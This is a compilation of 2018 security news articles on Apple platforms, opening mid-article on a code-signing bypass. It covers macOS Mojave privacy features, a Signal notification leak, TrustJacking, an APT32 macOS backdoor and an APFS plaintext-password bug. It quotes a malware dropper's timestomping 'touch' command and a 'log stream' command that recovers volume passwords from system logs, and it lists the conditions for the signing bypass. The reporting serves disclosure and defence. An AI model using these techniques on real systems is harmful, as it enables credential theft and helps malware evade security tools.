"Security, incident response, and forensics processes and personnel use code signing to weed out trusted code from untrusted code," explains Pitts. "By verifying signed code, detection and response personnel can speed up investigations by separating trusted code from untrusted code."

Pitts discovered, however, that the code signing mechanism in MacOS can be manipulated. All it requires is access to a genuinely signed Fat/Universal file. Other conditions require that the first Mach-O in the file must be validly signed by Apple; the added malicious code must be adhoc signed and i386 compiled for an x86_64 bit target macOS; and the CPU_TYPE in the Fat header must be set to an invalid type or CPU Type that is not native to the host chipset.

Okta Rex told SecurityWeek that this technique bypasses the gambit of whitelisting, incident response, and process inspection solutions by appearing to be signed by Apple's own root certificate.

The simple explanation is that the mechanism accepts the Apple signing, but skips this code and executes the malicious code. "By setting the CPU_Type to an invalid type or valid not native CPU type (example: PPC), the Mach-O loader will skip over the validly signed Mach-O binary and execute the malicious (non-Apple signed) code," writes the researcher.

In effect, the good code is skipped because CPU_TYPE is wrong; but the subsequent malicious code is run because the code signing API has a preference for the native CPU architecture (x86_64) for code signing checks and will default to checking the unsigned code if it is x86_64.

Okta Rex contacted Apple on February 22, 2018 with a report and proof of concept examples that were able to bypass third-party security tools. Apple responded in March by saying it did not see this issue as a security problem that it should directly address.

Okta Rex disagreed, and informed Apple that it would notify third-party developers itself so that they could address the issues at their end. By early April it had notified — through CERT/CC — all known affected third party developers. These include VirusTotal, Google, Facebook, Objective Development, F-Secure, Objective-See, Yelp, and Carbon Black.

The researcher also recommended to CERT/CC on April 18 "that a public blog post is the best method for reaching third parties that use code signing APIs in a private manner."

The researcher is not aware of any prior abuse of this technique by bad actors. Nevertheless, by exploiting this vulnerability, a threat actor could trick third-party security tools into believing their code is Apple-approved, letting malicious code live on a macOS machine until it’s patched.

All New Privacy and Security Features Coming in macOS 10.14 Mojave
8.6.2018 thehackernews  Apple

At Worldwide Developer Conference 2018 on Monday, Apple announced the next version of its macOS operating system, and it's called Mojave.
Besides introducing new features and improvements of macOS 10.14 Mojave—like Dark Mode, Group FaceTime, Dynamic Desktop, and Finder—at WWDC, Apple also revealed a bunch of new security and privacy features coming with the next major macOS update.
Apple CEO Tim Cook said the new features included in Mojave are "inspired by pro users, but designed for everyone," helping you protect from various security threats.
Here's a list of all macOS Mojave security and privacy features:
Safari's Enhanced "Intelligent Tracking Prevention"
It's no longer shocking that your online privacy is being invaded, and everything you search online is being tracked—thanks to third-party trackers present on the Internet in the form of social media like and sharing buttons that marketers and data brokers use to monitor web users as they browse.

But not anymore. With macOS Mojave, Safari has updated its "Intelligent Tracking Prevention"—a feature that limits the tracking ability of website using various ad-tracking and device fingerprinting techniques.
The all-new enhanced Intelligent Tracking Prevention will now automatically block all third-party trackers, including social media "Like" or "Share" buttons, as well as comment widgets from tracking users without their permission.
Safari will also help in defeating the "device fingerprinting" approach by exposing only generic configuration information of users' device and default fonts.
End-to-End Encrypted Group FaceTime (Up to 32 People)

That's really a huge security improvement, as at WWDC 2018, Apple has introduced group FaceTime feature that lets groups of 32 or fewer people do video calls at the same time, which have end-to-end encryption just like the already existing one-to-one audio and video calls and group audio calls.
End-to-encryption for group calls with the Facetime app means that there's no way for Apple or anyone to decrypt the data when it's in transit between devices.
macOS Mojave Will Alert When Your Camera & Mic Are Accessed
As we reported several times in past few years, cybercriminals have now been spreading new malware for macOS that targets built-in webcam and microphone to spy on users without detection.

To address this threat, macOS Mojave adds a new feature that monitors access to your macOS webcam/microphone and alerts you with new permission dialogues whenever an app tries to access the camera or microphone.
This new protection has primarily been designed to prevent malicious software from silently turning on these device features in order to spy on its users.
Excessive Data Access Request User Permissions
macOS Mojave also adds similar permission requirements for apps to access personal data like mail database, message history, file system and backups.
By default, the macOS Mojave will also protect your location information, contacts, photos, Safari data, mail database, message history, iTunes device backups, calendar, reminders, time machine backups, cookies, and more.
Secure (and Convenient) Password Management
We have long warned users to deploy a good password practice by keeping their passwords strong and unique for every website or service. Now, Apple has made it easier in macOS 10.14 Mojave and iOS 12.
While Safari in macOS has provided password suggestions for years when users are asked to create a login at a site, Apple has improved this feature in a way that Safari now automatically generates strong passwords, enters them into the web browser, and stores them in the iCloud keychain when users create new online accounts.
Previously, third-party password manager apps have done that much of tasks, and now Apple is integrating such functionalities directly into the next major versions of both macOS and iOS.

The company also announced a new feature that even flags reused passwords so that users can change them, a new interface that autofills one-time passwords provided by authentication apps, and a mechanism that shares passwords across all of a user's nearby devices, including iOS devices, Macs, and Apple TVs.
macOS Mojave Moves Software Updates from App Store to System Preferences
With the new macOS Mojave, Apple has also redesigned its Mac App Store a little bit and moved the system update mechanism to the System Preferences from the Mac App Store.
Apple has reintroduced "Software Update" option in the System Preferences windows, allowing users to update their operating system and native software without opening the App Store.
Moreover, Apple has also confirmed that Mojave will be its last version of macOS to support legacy 32-bit apps.
Similar High Sierra, users will be shown a dialog box when opening 32-bit apps in macOS 10.14 Mojave (beta1) with a message telling them that "This app will not work with future versions of macOS."

Here's How to Download All the Data Apple Collects About You
7.6.2018 thehackernews Apple

Apple is making it easier for its users to download their data the company has collected about them so far.
On Wednesday, Apple just launched a new Data and Privacy website that allows you to download everything that the company knows about you, from Apple ID info, device info, App Store activity, AppleCare history, your online shopping habits to all of your data stored in its iCloud.
A similar feature was recently offered by Facebook, enabling its users to download all of their data, not only what they have posted, but also information like facial recognition and location data, following the Cambridge Analytica scandal.
Apple has currently made this feature only available for people having accounts in European Union (along with Iceland, Liechtenstein, Norway and Switzerland), to comply with the General Data Protection Regulation (GDPR) act, which goes into effect on May 25.

However, Apple is planning to roll out this feature worldwide in the coming months. "We intend to provide these capabilities to customers around the world in the coming months," the company wrote.
The new GDPR act was passed with an aim to completely transform the way companies handle its users' personal data, giving users more control over their data. The act applies to all companies that collect the data of EU people, regardless of where they are based.
The GDPR will replace the British Data Protection Act 1998 from 25 May 2018.
The government has also warned businesses that if they fail to make changes in their policies before Friday, they could face fines of up to £17 Million (more than $22 Million), or 4% of their global turnover—whichever amount is higher.
That's why big companies like Apple have decided to inform their European customers about the new privacy policies.
Here's How to Download Your Data:
You can download all your data with a few simple clicks on the privacy portal.
Log in to privacy.apple.com on your Mac, PC, or iPad.
Select the Get started link under the "Obtain a copy of your data" heading in Manage your data.
You can press 'Select All' to download everything or tick the boxes of the data categories you want to download. iCloud data are provided into a separate list as this data may be large and can take a long time to download.
Apple splits up the data into chunks, which ranges from 1 GB up to a maximum of 25 GB, letting you select your preferred maximum file size. Select a size and hit 'Continue.'
Your download is now in progress, and Apple will send you an email when the files are available to download, which can take up to a week. Your downloaded data is then automatically deleted after 2 weeks.

Here's the List of Data that You can Download:
App Store, iTunes Store, iBooks Store and Apple Music activity
Apple ID account and device information
Apple Online Store and Retail Store activity
AppleCare support history, repair requests and more
Game Center activity
iCloud Bookmarks and Reading List
iCloud Calendars and Reminders
iCloud Contacts
iCloud Notes
Maps Report an Issue
Marketing subscriptions, downloads, and other activity
Other data
iCloud Drive files and documents
iCloud Mail
iCloud Photos
Besides data download feature, Apple is also providing an option of permanently deleting all of your data, which has been made available globally starting today. Once you initiate the data delete option, the company can take up to 7 days to approve the request.
But keep in mind: Once deleted, there is no way you can retrieve your data.

Apple Touts Privacy Features of New Operating Systems
6.6.2018 securityweek Apple

Apple on Monday said new operating systems powering its mobile devices and computers would include features designed to thwart the use of secret trackers to monitor people's online activities.

The announcement by Apple comes amid a growing focus on protecting privacy following a Facebook data scandal and new rules being enforced by the European Union for online services.

Apple, kicking off its annual developers conference, announced that coming versions of software powering iPhone and Mac computers will block the use of so-called "cookies" from "like" buttons that can follow people from one website to another.

"Turns out 'like' buttons and 'comment' fields can be used to track you, so this year we are shutting that down," Apple senior vice president of software engineering Craig Federighi told a standing-room crowd of some 6,000 developers at Apple's Worldwide Developers Conference in the heart of Silicon Valley.

New MacOS Mojave and iOS 12 software to be release later this year will also make it harder to use trackers to create "unique fingerprints" by gleaning data about devices being used, according to Federighi.

"It will become dramatically more difficult for data companies to identify your device and track you," Federighi said.

"We are bringing all these protections to both Mojave and iOS 12."

Enhanced privacy was part of a slew of improvements touted by Apple to developers, whose creations are key to the popularity of iPhones, iPads and Mac computers.

Apple's software upgrades also include features that help users understand how much time they are spending on their devices, amid concerns of growing smartphone "addiction."

Apple Boosts Security in iOS 12, macOS Mojave
6.6.2018 securityweek Apple

At its Worldwide Developers Conference (WWDC) 2018 this week, Apple shared information on the security improvements that iOS 12 and macOS Mojave are set to bring when they arrive this fall.

While previewing the next platform iterations at the event, Apple revealed features that will change the overall user experience on both mobile and desktop devices, but also presented enhancements that should improve the overall privacy and security of its users.

One of the main changes impacts the Safari browser on both iOS and macOS, which will soon deliver improved Intelligent Tracking Prevention capabilities, preventing social media buttons (such as “Like” and “Share”) from tracking users without permission.

“Safari now also presents simplified system information when users browse the web, preventing them from being tracked based on their system configuration,” the iPhone maker says.

Other features the company previewed for the upcoming platform iterations include end-to-end encryption for Facetime group calls and password managers integrated into macOS and iOS, to help users employ stronger passwords, store them securely, and automatically enter them when needed.

“Safari now also automatically creates, autofills and stores strong passwords when users create new online accounts and flags reused passwords so users can change them,” Apple said.

On macOS Mojave, new data protections will require applications to ask for user permission before using the camera and microphone or before accessing personal data such as mail history and messages database, the tech giant also says. This should prevent malicious software from spying on users.

To further strengthen user privacy, Apple also appears set to roll out a USB Restricted Mode in iOS 12, a feature that was initially noticed in iOS 11.3 beta, but later removed, only to be introduced in iOS 11.4 beta again.

With this new feature, an iPhone connected via USB to a computer (or to an USB accessory) will ask for the passcode every week, or it will lock down the Lightning port in charge only mode, thus preventing access to the data.

“To improve security, for a locked iOS device to communicate with USB accessories you must connect an accessory via lightning connector to the device while unlocked—or enter your device passcode while connected—at least once a week,” Apple described the feature in iOS 11.3 beta.

As ElcomSoft’s Oleg Afonin pointed out last month, this means that law enforcement agencies attempting to retrieve data from a suspect’s iPhone will only have a small window of opportunity before the device locks down. The same applies to thieves and anyone else targeting that data.

The new feature appears as a reaction to a clash with the FBI a couple of years ago over the unlocking of the San Bernardino shooter’s iPhone. The legal battle eventually sparked a debate between supporters of backdoors in user products to facilitate criminal and national security investigations, and those who want data to be properly protected.

Later this month, as part of iOS 12 public beta, users will also take advantage of increased control over notifications, and will get detailed information on the time spent on the phone, courtesy of a new Screen Time feature. There’s also an App Limits feature to limit the time spent in an app, which gives parents more control over their children’s use of a mobile device.

ProtonMail Launches VPN Application for macOS
1.6.2018 securityweek  Apple

Encrypted email service provider ProtonMail on Wednesday announced the availability of a virtual private network (VPN) service for macOS users.

Initially introduced for some of its paid ProtonMail users in early 2017, the VPN service saw a wider launch on Windows last year, and also arrived on Android in January 2018. Last year, the CERN-founded company also launched a Tor hidden service and an encrypted contacts manager.

Following a beta testing period, the Swiss-based service provider is now making the VPN application available for all macOS users, allowing them to easily protect their Internet connections. Users who already have a ProtonVPN or ProtonMail account only need to download the application, log in, and start using it immediately.

Developed by the same team behind ProtonMail, the VPN service takes advantage of technologies such as Secure Core and Tor integration and is available for free with no ads. Furthermore, the company claims that users can enjoy it without worrying about malware or monetization of user data.

“With our VPN for Mac application, it is now extremely simple to switch countries, create custom profiles, connect to the Tor network, and route your traffic through our Secure Core servers. Not to mention all the essential perks of ProtonVPN, like hiding your IP address, defending against cyber-attacks, and unblocking censored content,” ProtonMail says.

Users opting for the free plan get unlimited bandwidth and access to servers in three continents. Upgrade options are available for those looking to gain access to more servers and extra features.

Many members of the ProtonMail community have requested the macOS app, the company says. Over the past months, the service provider has worked closely with over ten thousand beta testers to address bugs in the application and ensure it is not only easy to use, but also visually appealing.

The macOS app also takes advantage of the modern IKEv2 protocol for higher performance, providing users with a faster and more stable connection (it promises speeds of more than 300 Mbps, under the right conditions).

Users will be able to easily connect to any country with a single click, to choose from the available Secure Core servers, Tor servers, and P2P servers, and to create and save custom connection profiles. A VPN kill switch is also available, designed to cut the Internet if the connection to the VPN drops, thus preventing data from leaking when the VPN is not connected.

“More people are starting to wake up to the fact that privacy matters, and it is important to make tools like VPN widely accessible, especially for the over 1.5 billion people around the world who live under Internet surveillance and censorship,” Dr. Andy Yen, CEO of ProtonMail, said in a statement.

Self-destructing messages received on 'Signal for Mac' can be recovered later
11.5.2018 thehackernews Apple

It turns out that macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing (self-destructing) messages from the recipient's system, leaving the content of your sensitive messages at risk of getting exposed.
For those unaware, the disappearing messages in Signal self-destruct after a particular duration set by the sender, leaving no trace of it on the receiver's device or Signal servers.
However, security researcher Alec Muffett noticed that the messages that are supposed to be "disappearing" can still be seen—even if they are deleted from the app.
Another security researcher Patrick Wardle reproduced the issue and explained that macOS makes a copy (partial for long messages) of disappearing messages in a user-readable database of macOS's Notification Center, from where they can be recovered anytime later.
If you want to keep an on your incoming messages without having to check your inbox obsessively, macOS desktop notifications (banners and alerts) that appear in the upper-right corner of your screen is a great way to alert you of things you don't want to miss.

According to a blog post published by Wardle, if you have enabled notifications for Signal app, the service will show you notifications for the disappearing messages as well in the form of truncated messages (which is generally 1-1.5 lines of the full message).
Now, sharing incoming disappearing messages with the notification system leads to two privacy issues:
"Disappearing" messages may remain in the User Interface of macOS Notification Center even after being deleted within the Signal app and can be seen in the notification bar until manually closed by the user.
In the backend, the SQLite database of Notification Center also keeps a copy of truncated messages, which can be accessed with normal user permissions, or by a malicious app installed on the system.
Wardle suggests either Signal should not provide notifications service for disappearing messages or should explicitly delete such notifications from the system’s database when it removes the messages from the app UI.
Meanwhile, to protect the content of your sensitive messages so that no malicious app, hacker or your wife can recover them, you should consider disabling notifications service until Signal patches this issue.

Signal disappearing messages can be recovered by the macOS client
10.5.2018 securityaffairs  Apple

The macOS client for the Signal fails to properly delete disappearing messages from the recipient’s system, potentially exposing sensitive messages.
Signal is considered the most secure instant messaging app, searching for it on the Internet it is possible to read the Edward Snowden’ testimony:

“Use anything by Open Whisper Systems” Snowden says.

The Cryptographer and Professor at Johns Hopkins University Matt Green and the popular security expert Bruce Schneier are other two admirers of the Signal app

Signal was also approved by the U.S. Senate for official communications among staff members.

But even most complex and efficient software could be affected by severe bugs.

The macOS client for the Signal fails to properly delete disappearing messages from the recipient’s system, potentially exposing sensitive messages.

The disappearing messages in Signal are automatically deleted after a specific interval of time set up by the sender. The peculiarity of the feature is that there is no trace of the destroyed message on the receiver’s device or Signal servers, at least this is the expected behavior.

The security expert Alec Muffett discovered that the messages once disappeared can still be recovered from the recipient’s device.

Alec Muffett
#HEADSUP: #Security Issue in #Signal. If you are using the @signalapp desktop app for Mac, check your notifications bar; messages get copied there and they seem to persist — even if they are "disappearing" messages which have been deleted/expunged from the app.

8:14 PM - May 8, 2018
55 people are talking about this
Twitter Ads info and privacy
Former NSA hacker and security expert Patrick Wardle analyzed the issue and discovered that macOS client makes a copy (partial for long messages) of disappearing messages in a user-readable database of macOS’s Notification Center. This copy could be recovered anytime by researchers and hackers.

“While the application deletes the messages (once the ‘disappear’ time is hit) from the app’s UI – the message may still remain in macOS’s Notification Center.” wrote Wardle.

“This apparently occurs because:

Signal displays (posts) a message notification (with the content of the message) to the Notification Center (if the app is not in the foreground).
The OS automatically dismisses the notification ‘banner’ … but the notification (which contains the message contents) remain in the Notification Center.”
Signal, does not explicitly delete this notification when it deletes messages from the app UI.”
To discover where the disappearing messages are stored Wardle used the macOS’s built-in file monitoring utilty ‘fs_usage.’

“Looks like the ‘user notification daemon’ (usernoted) is accessing a file related to a database (specifically a SQLite write-ahead log).” added the expert.

“Running the ‘file’ command on the ‘db2/db’ file reveals (rather unsurprisingly) it’s an SQLite database, that is readable with user (i.e. non-root) permissions”

Wardle noticed the ‘record’ table that contains the notifications, including their contents.

Signal disappearing messages

Data is stored in ‘binary’ format so Wardle converted it from hex to ASCII, obtaining “bplist00”. It is a binary plist that can be easily decoded/parsed using the biplist module.

The decoded text included the text of all Signal messages, including the disappearing messages.

“Well Alec, hope this explains exactly why those ‘disappearing’ Signal messages still are hanging around. In short, anything that gets displayed as a notification (yes, including ‘disappearing’ Signal messages) in the macOS Notification Center, is recorded by the OS.” concluded Wardle.
“If the application wants the item to be removed from the Notification Center, it must ensure that the alert is dismissed by the user or programmatically! However, it is not clear that this also ‘expunges’ the notifications (and the their contents) from the notification database… i’m guessing not! If this is the case, Signal may have to avoid generating notifications (containing the message body) for disappearing messages…”

The good news is that the Signal’s iOS application is not affected at least the messages are removed from the iOS Notification Center once the user has viewed them.

Apple Patches macOS, iOS, Safari
26.4.2018 securityweek Apple

Apple this week released patches to address a handful of security vulnerabilities in macOS, iOS, and Safari.

Available for macOS High Sierra 10.13.4, Security Update 2018-001 addresses two vulnerabilities impacting Crash Reporter and LinkPresentation, respectively.

The first is a memory corruption issue that could allow an application to gain elevated privileges. Tracked as CVE-2018-4206, the security flaw was reported by Ian Beer of Google Project Zero. Apple addressed the bug with improved error handling.

The tech company also resolved a spoofing issue in the handling of URLs, which could result in UI spoofing when processing a maliciously crafted text message. Tracked as CVE-2018-4187 and reported by Zhiyang Zeng, of Tencent Security Platform Department, and Roman Mueller, the issue was addressed with improved input validation.

In a blog post in March, Mueller explained that the vulnerability was introduced when Apple added QR code reading capabilities to the camera app and that it resides in the application being unable to correctly detect the hostname in a URL.

Thus, a malicious actor could craft a QR code that, when read with the camera app, would display a different hostname in the notification shown to the user compared to the domain Safari would actually access.

Both of these issues were resolved in iOS 11.3.1 as well, which is now available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation. Additionally, the iOS update patches two bugs in WebKit.

Both of these bugs are memory corruption issues that could lead to arbitrary code execution when processing maliciously crafted web content. To resolve these vulnerabilities, Apple improved state management and memory handling, respectively.

The first of these bugs is tracked as CVE-2018-4200 and was found by Ivan Fratric of Google Project Zero. Tracked as CVE-2018-4204, the second issue was reported by Richard Zhu, working with Trend Micro's Zero Day Initiative.

Now available for OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4, the newly released Safari 11.1 includes patches for both WebKit vulnerabilities.

'iTunes Wi-Fi Sync' Feature Could Let Attackers Hijack Your iPhone, iPad Remotely
25.4.2018 thehackernews  Apple

Be careful while plugging your iPhone into a friend's laptop for a quick charge or sharing selected files.
Researchers at Symantec have issued a security warning for iPhone and iPad users about a new attack, which they named "TrustJacking," that could allow someone you trust to remotely take persistent control of, and extract data from your Apple device.
Apple provides an iTunes Wi-Fi sync feature in iOS that allows users to sync their iPhones to a computer wirelessly. To enable this feature, users have to grant one-time permission to a trusted computer (with iTunes) over a USB cable.
Once enabled, the feature allows the computer owner to secretly spy on your iPhone over the Wi-Fi network without requiring any authentication, even when your phone is no longer physically connected to that computer.
"Reading the text, the user is led to believe that this is only relevant while the device is physically connected to the computer, so assumes that disconnecting it will prevent any access to his private data," Symantec said.
Since there is no noticeable indication on the victim's device, Symantec believes the feature could exploit the "relation of trust the victim has between his iOS device and a computer."

Researchers suggest following scenarios where TrustJacking attack can be successfully performed, especially when you trust a wrong computer:
Connecting your phone to a free charger at an airport, and mistakenly approving the pop-up permission message to trust the connected station.
A remote attacker, not in the same Wi-Fi network can also access iPhone data if the device owner's own "trusted" PC or Mac has been compromised by malware.
Moreover, iTunes Wi-Fi sync feature could also be used to remotely install malware apps on your iPhone, as well as to download a backup and steal all your photos, SMS / iMessage chats history, and application data.
"An attacker can also use this access to the device to install malicious apps, and even replace existing apps with a modified wrapped version that looks exactly like the original app, but is able to spy on the user while using the app and even leverage private APIs to spy on other activities all the time," Symantec said.
The TrustJacking attack could also allow trusted computers to watch your device's screen in real-time by repeatedly taking remote screenshots, observing and recording your every action.

Apple has now introduced another security layer in iOS 11, asking users to enter their iPhone's passcode while pairing their iPhone with a computer, after getting notified by the Symantec researchers.
However, Symantec says the loophole remains open, as the patch does not address the primary concern, i.e., the absence of noticeable indication or mandatory re-authentication between the user's device and the trusted computer after a given interval of time.
"While we appreciate the mitigation that Apple has taken, we’d like to highlight that it does not address Trustjacking in a holistic manner," Symantec's Roy Iarchy said. "Once the user has chosen to trust the compromised computer, the rest of the exploit continues to work as described above."
The best and simple way to protect yourself is to ensure that no unwanted computers are being trusted by your iOS device. For this, you can remove the trusted computers list by going to Settings → General → Reset → Reset Location & Privacy.
Also, most important, always deny the access when asked to trust the computer while charging your iOS device. Your device would still charge using the computer, without exposing your data.

New Tool Detects Evil Maid Attacks on Mac Laptops
25.4.2018 securityweek Apple

A security researcher has developed a simple tool that helps Mac laptop owners detect unauthorized physical access to their device, also known as an evil maid attack, by monitoring its lid.

The free tool, named DoNotDisturb (DND), was created by Patrick Wardle, co-founder and chief research officer at enterprise macOS security company Digita Security.

Leaving a laptop unattended – for example, leaving it in the hotel room while traveling – puts the device at risk of evil maid attacks. An attacker who has physical access to the targeted device may steal data from it or install malicious software without leaving any obvious evidence behind.

The DND tool attempts to address this issue on Mac laptops by monitoring lid events. A majority of evil maid attacks require the attacker to open the device’s lid. However, there are some types of physical attacks that do not require opening the device’s lid, and the tool works based on the premise that the user closes the device’s lid when leaving it unattended.

DND is a simple tool, but it does include some interesting features and options. Users can configure the app to start at login and run in passive mode, which means it will run silently without any visible alerts. The “No Icon” mode ensures that an icon is not displayed in the macOS/OS X menu bar, making the tool even stealthier.

DoNotDisturb - DND

The main tool installed on the monitored Mac laptop can be paired with an iOS application that allows the user to view alerts and respond. The iOS app can be used to dismiss an alert, take a picture of the individual using the monitored laptop, and remotely shut down the device. While the macOS tool is free, users have to pay a monthly or yearly subscription fee ($9.99 per year) to use the iOS companion for more than one week. The iOS app is optional, but users will not receive alerts and they cannot take any action remotely in case of an attack.

DND can be configured to take specific actions when the device’s lid is opened. For example, it can execute a script or a binary file, or it can start tracking the attacker’s activities, including new processes, new logins, and USB device insertions.

For users who want to keep DND active on their device at all times but do not want the app to trigger an alert whenever they open the laptop’s lid themselves, the tool can be configured to ignore lid events in specific cases. However, this setting requires a newer model Mac laptop that has a touch bar and is running macOS 10.13.4 or newer.

“When this mode is enabled, DND will ignore any lid open events if proceeded by a successful touch ID authentication event within 10 seconds. The idea is that this allows one to tell DND to trust (or ignore) a lid event that is a result of you (vs. somebody else) opening your laptop,” Wardle explained.

Wardle is well known on the Mac hacking scene thanks to the useful apps he has released and the vulnerabilities he has found in both Apple’s own code and third-party software.

iOS users can now use Google prompt on their devices via the Gmail app
20.4.2018 securityaffairs Apple

Google announced that iOS users can now benefit from Google prompt feature via their Gmail application. Security and usability are crucial requirements for Google.
Google announced that iOS users can now receive Google prompts via their Gmail application.

“In 2017, we made Google prompt the primary choice for G Suite users turning on two-step verification for the first time. Back then, we noted that users with iOS devices would need to install the Google app in order to use the feature.” reads the blog post published by Google.

“Today, we’re making it possible for users with iOS devices to receive prompts via their Gmail app as well. This should encourage more people to use Google prompt, which is an easier and more secure method of authenticating an account,”

Google prompt

Google prompt was designed to inform users of any attempt to log into their accounts and confirm it with a tap on their mobile devices.

Gmail users can approve sign-in requests via 2-Step Verification (2SV) by simply taping a “Yes” button on their smartphone since June 2016.

The 2-Step Verification process leverages login authentication code sent via SMS, once the user has received it, he will need to enter it on a sign in page.

The tech giant has launched the Google prompt to make this process simpler, it displays a popup message on the user’s mobile devices asking them to confirm the login with a single tap.

Google prompt was rolled out to both Android and iOS devices, but on iOS, the users need to have the Google Search app installed.

In October 2017, Big G introduced Google prompt in the G Suite. The company implemented the feature to all of its users who choose to enable the extra layer of security, but in order to use it, iOS users need to have the Google app installed on the device.

Now Google has overwhelmed this limitation and iOS users can benefit from the Google prompt without having Google app installed.

iOS users who have both the Google app and Gmail app installed on their devices will receive the prompts from Gmail.

The availability of Google prompt in Gmail for iOS will be available to all users in a few days.

Google Prompt Arrives in Gmail for iOS
20.4.2018 securityweek Apple

Google this week announced that iOS users can now receive Google prompts via their Gmail application.

First released in June 2016 as a new 2-Step Verification (2SV) functionality, Google prompt allows users to confirm an attempt to log into their accounts with a single tap on their mobile devices.

Typical 2SV processes involve receiving a SMS with a login code that needs to be entered on a sign in page, a step that could prove an inconvenience at times. To eliminate this, the search giant launched Google prompt, which displays a popup message on the user’s mobile devices, asking them to confirm the login.

The feature was rolled out to both Android and iOS devices right from the start. On iOS, however, users had to have the Google Search app installed to take advantage of the feature.

In July last year, after adding real-time security information about the login attempt, such as when and where it was made, Google started inviting 2SV SMS users to Google prompt.

In October last year, the company made Google prompt the primary choice for G Suite users turning on 2SV for the first time. The company pushed the feature to all of its users who choose to enable the extra layer of security, but continued to require the Google app to be installed for iOS users to benefit from the added security.

In an attempt to entice more users to start using Google prompt, the search company has now decided to eliminate this requirement.

“Today, we’re making it possible for users with iOS devices to receive prompts via their Gmail app as well. This should encourage more people to use Google prompt, which is an easier and more secure method of authenticating an account,” Google notes in a blog post.

According to Google, users who have both the Google app and Gmail app installed on their iOS devices will see the prompts from Gmail.

The availability of Google prompt in Gmail for iOS is rolling out for all G Suite editions and should become available to all users in a matter of days (though it could take up to 2 weeks to become visible for some of them).

New macOS Backdoor Linked to Cyber-espionage Group
6.4.2018 securityweek CyberSpy  Apple

A recently discovered macOS backdoor is believed to be a new version of malware previously associated with the OceanLotus cyber-espionage group, Trend Micro says.

Also known as APT 32, APT-C-00, SeaLotus, and Cobalt Kitty, OceanLotus is believed to be operating out of Vietnam and has been targeting high-profile corporate and government organizations in Southeast Asia. Well-resourced and determined, the group uses custom-built malware and already established techniques.

Some of the group’s targets include human rights organizations, media organizations, research institutes, and maritime construction firms.

The newly discovered macOS backdoor, which Trend Micro detects as OSX_OCEANLOTUS.D, has been observed on machines that have the Perl programming language installed.

The malware is being distributed via malicious documents attached to emails. The document masquerades as the registration form for an event with HDMC, an organization in Vietnam that advertises national independence and democracy.

The document contains malicious, obfuscated macros with a payload written in Perl. The macro extracts an XML file from the Word document. This file is an executable acting as the dropper for the final payload, which is the backdoor.

The dropper, which has all of its strings encrypted using a hardcoded RSA256 key, is also used to establish the backdoor’s persistence on the infected systems. The dropper checks whether it runs as root or not, and uses different path and filename based on that.

The dropper sets the backdoor’s attributes to “hidden” and uses random values for the file date and time, and deletes itself at the end of the process.

The backdoor has two main functions, which collect platform information and sending it to the command and control (C&C) server. It can also receive additional C&C communication information, which is encrypted before being sent.

“Malicious attacks targeting Mac devices are not as common as its counterparts, but the discovery of this new macOS backdoor that is presumably distributed via phishing email calls for every user to adopt best practices for phishing attacks regardless of operating system,” Trend Micro concludes.

OSX_OCEANLOTUS.D, a new macOS backdoor linked to APT 32 group
6.4.2018 securityaffairs APT  Apple

Security experts at Trend Micro have discovered a new macOS backdoor that they linked to the APT 32 (OceanLotus, APT-C-00, SeaLotus, and Cobalt Kitty) cyber espionage group.
The APT32 group has been active since at least 2013, according to the experts it is a state-sponsored hacking group. The hackers hit organizations across multiple industries and have also targeted foreign governments, dissidents, and journalists.

Since at least 2014, experts at FireEye have observed APT32 targeting foreign corporations with an interest in Vietnam’s manufacturing, consumer products, and hospitality sectors. The APT32 is also targeting peripheral network security and technology infrastructure corporations, and security firms that may have connections with foreign investors.

The APT32 group uses custom-built malware for its attacks, the newly discovered macOS backdoor was tracked by experts at Trend Micro as OSX_OCEANLOTUS.D.

The researchers found the backdoor on macOS systems that have the Perl programming language installed.

“We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. APT 32, APT-C-00, SeaLotus, and Cobalt Kitty).” reads the analysis published by Trend Micro.

“The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed.”

The hackers used spear-phishing messages as attack vectors, the backdoor is distributed via weaponized documents attached to emails. The bait document masquerades as the registration form for an event with HDMC, an organization in Vietnam that advertises national independence and democracy.

APT 32 _MacOS_backdoor

The malicious document contains an obfuscated macros with a Perl payload. The macro extracts an XML file (theme0.xml) from the document, it is a Mach-O 32-bit executable with a 0xFEEDFACE signature that acts as a dropper for the final OSX_OCEANLOTUS.D backdoor.

“All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key. There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string.” continues the report.

“Using the setStartup() method, the dropper first checks if it is running as a root or not. Based on that, the GET_PROCESSPATH and GET_PROCESSNAME methods will decrypt the hardcoded path and filename where the backdoor should be installed.”

Once the dropper has installed the backdoor, it will set its attributes to “hidden” and set file date and time to random values using the touch command:

touch –t YYMMDDMM “/path/filename” > /dev/null.

It also changes the permissions to 0x1ed = 755, which is equal to u=rwx,go=rx.

The backdoor loops on two main functions, infoClient and runHandle; infoClient is used to collect platform information and send them to the command and control (C&C) server, meanwhile runHandle implements backdoor capabilities.

The discovery of a new backdoor linked to the APT32 group confirms that the state-sponsored crew was very active in the last months.

Apple macOS Bug Reveals Passwords for APFS Encrypted Volumes in Plaintext
1.4.2018 thehackernews Apple

A severe programming bug has been found in APFS file system for macOS High Sierra operating system that exposes passwords of encrypted external drives in plain text.
Introduced two years ago, APFS (Apple File System) is an optimized file system for flash and SSD-based storage solutions running MacOS, iOS, tvOS or WatchOS, and promises strong encryption and better performance.
Discovered by forensic analyst Sarah Edwards, the bug leaves encryption password for a newly created APFS volume (e.g., encrypting USB drive using Disk Utility) in the unified logs in plaintext, as well as while encrypting previously created but unencrypted volumes.
"Why is this a big deal? Well, passwords stored in plaintext can be discovered by anyone with unauthorized access to your machine, and malware can collect log files as well and send them off to someone with malicious intent," Edwards said.

The password for an encrypted APFS volume can easily be retrieved by running following simple 'newfs_apfs' command in the terminal:
log stream --info --predicate 'eventMessage contains "newfs_"'
However, this bug is not as stupid as the previously disclosed root password bug wherein the password hint section was exposing the actual password in the plain text.
Though the exact reason of the programming error is not clear, the researcher believes "it was likely a result of other APFS encryption related bugs (or at least somehow related to it), so perhaps Apple felt it didn't need to provide the additional details."
It should be noted that you would not find the password in the plaintext when converting a non-APFS drive to APFS and then encrypting the drive.
